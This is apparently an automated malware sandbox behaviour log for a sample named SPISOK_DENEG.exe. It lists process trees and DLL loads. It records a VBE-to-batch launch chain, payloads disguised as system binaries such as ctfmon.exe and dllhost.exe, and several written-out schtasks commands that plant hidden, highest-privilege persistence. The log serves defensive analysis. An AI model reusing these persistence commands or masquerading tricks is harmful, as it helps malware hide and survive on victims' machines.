                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                  Source: unknownProcess created: C:\ProviderserverruntimeperfSvc\ctfmon.exe C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                  Source: unknownProcess created: C:\Users\Default\Documents\dllhost.exe "C:\Users\Default User\Documents\dllhost.exe"
                                  Source: unknownProcess created: C:\Users\Default\Documents\dllhost.exe "C:\Users\Default User\Documents\dllhost.exe"
                                  Source: unknownProcess created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                  Source: unknownProcess created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                  Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\explorer.exe "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat"
                                  Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\explorer.exe "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: unknownProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                  Source: unknownProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat" Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
